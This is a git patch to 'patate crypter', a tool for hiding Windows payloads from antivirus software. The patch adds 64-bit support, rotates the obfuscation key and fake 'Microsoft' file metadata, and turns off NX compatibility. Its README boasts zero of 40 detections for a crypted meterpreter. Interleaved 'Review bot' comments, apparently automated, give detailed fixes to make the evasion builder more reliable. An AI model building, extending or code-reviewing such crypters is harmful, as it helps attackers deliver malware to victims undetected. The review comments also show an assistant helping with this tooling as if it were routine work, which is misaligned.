From 4c45ea84222db21378fb7f58f77692b659ac5c02 Mon Sep 17 00:00:00 2001
From: ALittlePatate
Date: Tue, 19 Mar 2024 10:29:40 +0100
Subject: [PATCH] add: x64 bit support, automatic detection of architecture, 0/40 detects in x64 bit
---
 Builder/gui.py | 23 +++++++++++++++++++++--
 Builder/obfuscation.py | 4 ++--
 Builder/requirements.txt | 3 ++-
 Crypter/config.h | 2 +-
 Crypter/patate-crypter.rc | 8 ++++----
 Crypter/patate-crypter.vcxproj | 19 ++++++++++++-------
 Crypter/patate-crypter.vcxproj.filters | 6 ------
 README.md | 5 +++--
 8 files changed, 45 insertions(+), 25 deletions(-)
diff --git a/Builder/gui.py b/Builder/gui.py
index 14bd21b..fd1605d 100644
--- a/Builder/gui.py
+++ b/Builder/gui.py
@@ -37,6 +37,7 @@ from PyQt5.QtGui import QPixmap
 from obfuscation import obfuscate
 from metadata import change_metadata
 import os, shutil, glob
+import pefile
 class Ui_mainWindow(object):
 def __init__(self) :
@@ -141,6 +142,7 @@ class Ui_mainWindow(object):
 self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
 def generate(self) :
+ is_64bit = False
 in_filename = self.filepath
 out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
 xor_key = ''
@@ -155,6 +157,19 @@ class Ui_mainWindow(object):
 QCoreApplication.processEvents()
 return
+ try :
+ pe = pefile.PE(in_filename)
+ except :
+ self.label_2.setText("File is not a binary.")
+ QCoreApplication.processEvents()
+ return
+ if hex(pe.FILE_HEADER.Machine) == '0x14c':
+ self.label_2.setText("File is a 32-bit binary")
+ else:
+ self.label_2.setText("File is a 64-bit binary")
+ is_64bit = True
+ QCoreApplication.processEvents()
+
 self.label_2.setText("Creating sample header...")
 QCoreApplication.processEvents()
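Review bot: The bare `except :` around `pefile.PE(in_filename)` reports every failure — a missing file, a permission error, even a KeyboardInterrupt — as "File is not a binary."; catch the parser's own error instead, `except pefile.PEFormatError:`, and let anything else surface. The architecture check on the following lines compares a hex string and treats every machine type other than 0x14c as 64-bit, so an ARM or otherwise unsupported image would silently be built as x64; compare the integer field against the named constants, `if pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE['IMAGE_FILE_MACHINE_I386']:` / `elif pe.FILE_HEADER.Machine == pefile.MACHINE_TYPE['IMAGE_FILE_MACHINE_AMD64']:`, and return with a label message for any other value. The parsed `pe` object is never released; `pe.close()` after the check frees the file mapping before the later steps touch the file. generate() continues past this hunk.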
@@ -184,7 +199,7 @@ class Ui_mainWindow(object):
 self.label_2.setText("Adding junk code...")
 QCoreApplication.processEvents()
- obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk)
+ obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk, is_64bit)
 self.label_2.setText("done.")
 QCoreApplication.processEvents()
@@ -201,7 +216,11 @@ class Ui_mainWindow(object):
 vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
 cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
- return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
+ if is_64bit :
+ return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x64;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
+ else :
+ return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
+
 if return_code :
 self.label_2.setText("build failed.")
diff --git a/Builder/obfuscation.py b/Builder/obfuscation.py
index 679c929..d4a35ac 100644
--- a/Builder/obfuscation.py
+++ b/Builder/obfuscation.py
@@ -149,7 +149,7 @@ def GetRandomControlFlow():
 return cpp_code
 FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
-def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
+def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
 if PASS < CFLOW_PASS : PASS = CFLOW_PASS
 if not cflow and not junk : PASS = 0
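Review bot: The two `os.system` calls under `if is_64bit :` in the MSBuild hunk differ only in `Platform=x64` versus `Platform=x86`, so the long command string is duplicated and every later change to it has to be made twice; derive the value once, `platform = "x64" if is_64bit else "x86"`, and build a single command from it. The command is still a shell string assembled from `cmd_line` and `out_filename`, and the latter is taken from the user-selected file name, so a name containing a quote, `;` or `&` breaks the MSBuild invocation at the shell; passing the pieces as a list to `subprocess.run([cmd_line, "../Crypter", "/p:...", "/t:Rebuild"])` (with `import subprocess`) avoids shell parsing and the quoting problem entirely. generate() starts before this hunk and continues after it.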
@@ -237,7 +237,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
 if GetRandomBool() and in_func : # do we call a function ?
 out.append(CallRandomFunction()+"\n")
- if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?
+ if GetRandomBool() and in_func and cflow and k < CFLOW_PASS and not is64bit : # do we mess up control flow ?
 out.append(GetRandomAssemblyBlock()+"\n")
 if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?
diff --git a/Builder/requirements.txt b/Builder/requirements.txt
index df7496a..3722897 100644
--- a/Builder/requirements.txt
+++ b/Builder/requirements.txt
@@ -1,2 +1,3 @@
 pillow
-pywin32
\ No newline at end of file
+pywin32
+pefile
\ No newline at end of file
diff --git a/Crypter/config.h b/Crypter/config.h
index 7961931..050b930 100644
--- a/Crypter/config.h
+++ b/Crypter/config.h
@@ -1,2 +1,2 @@
 #pragma once
-#define KEY "mkhjqsdhfjbzqfcqzf"
\ No newline at end of file
+#define KEY "pqihzifvqzidbzq"
\ No newline at end of file
diff --git a/Crypter/patate-crypter.rc b/Crypter/patate-crypter.rc
index 3370a49..7e1cd16 100644
--- a/Crypter/patate-crypter.rc
+++ b/Crypter/patate-crypter.rc
@@ -68,12 +68,12 @@ BEGIN
 BLOCK "040c04b0"
 BEGIN
 VALUE "CompanyName", "Microsoft"
- VALUE "FileDescription", "clgdknugqsthezarlwbq"
+ VALUE "FileDescription", "mwqaxnynrtvjaafmtwew"
 VALUE "FileVersion", "1.0.0.1"
- VALUE "InternalName", "yhoqres.exe"
+ VALUE "InternalName", "hoflypx.exe"
 VALUE "LegalCopyright", "Copyright (C) 2023"
- VALUE "OriginalFilename", "erbggay.exe"
- VALUE "ProductName", "awwmoqx.exe"
+ VALUE "OriginalFilename", "ckhvspq.exe"
+ VALUE "ProductName", "rrrxbyl.exe"
 VALUE "ProductVersion", "1.0.0.1"
 END
 END
diff --git a/Crypter/patate-crypter.vcxproj b/Crypter/patate-crypter.vcxproj
index 4c4935b..7f73446 100644
--- a/Crypter/patate-crypter.vcxproj
+++ b/Crypter/patate-crypter.vcxproj
@@ -49,7 +49,7 @@ Application false v143 - true + false MultiByte
@@ -138,6 +138,7 @@ _DEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS true stdcpp17 + false Console
@@ -148,20 +149,24 @@ Level3 - true - true + false + false true NDEBUG;_CONSOLE;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS true stdcpp17 MultiThreaded + Disabled + false + EnableFastChecks - Console - true - true - true + Windows + false + false + false /NXCOMPAT:no %(AdditionalOptions) + false
diff --git a/Crypter/patate-crypter.vcxproj.filters b/Crypter/patate-crypter.vcxproj.filters
index 6ebff34..db9ee56 100644
--- a/Crypter/patate-crypter.vcxproj.filters
+++ b/Crypter/patate-crypter.vcxproj.filters
@@ -18,9 +18,6 @@ Fichiers sources - - Fichiers sources -
@@ -32,9 +29,6 @@ Fichiers d%27en-tĂȘte - - Fichiers d%27en-tĂȘte -
diff --git a/README.md b/README.md
index eb4c8e3..2edbf79 100644
--- a/README.md
+++ b/README.md
@@ -4,14 +4,15 @@ The project structure is **very** messy because i wasn't planning on releasing i
 I will not provide any support for running the program, it is only made for people interested in cyber security to learn more about how AV work.
 # Limitations
-patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.
+patate crypter officially supports 32bit and 64bit DLLs and PEs.
There is an issue where the reallocations would fail for specific payloads, TOFIX.
 There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).
 # Detection rate
 There is currently 0/40 detections for a crypted meterperter :
 - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
-- [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
+- [crypted 32 bit](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
+- [crypted 64 bit](https://www.kleenscan.com/scan_result/9c0ae91e19425ff4c2d8120f1cb787f0480c7780faa6e1e57517b2aea831e272)
 # How does it work ?
 The crypter (compile time) works by :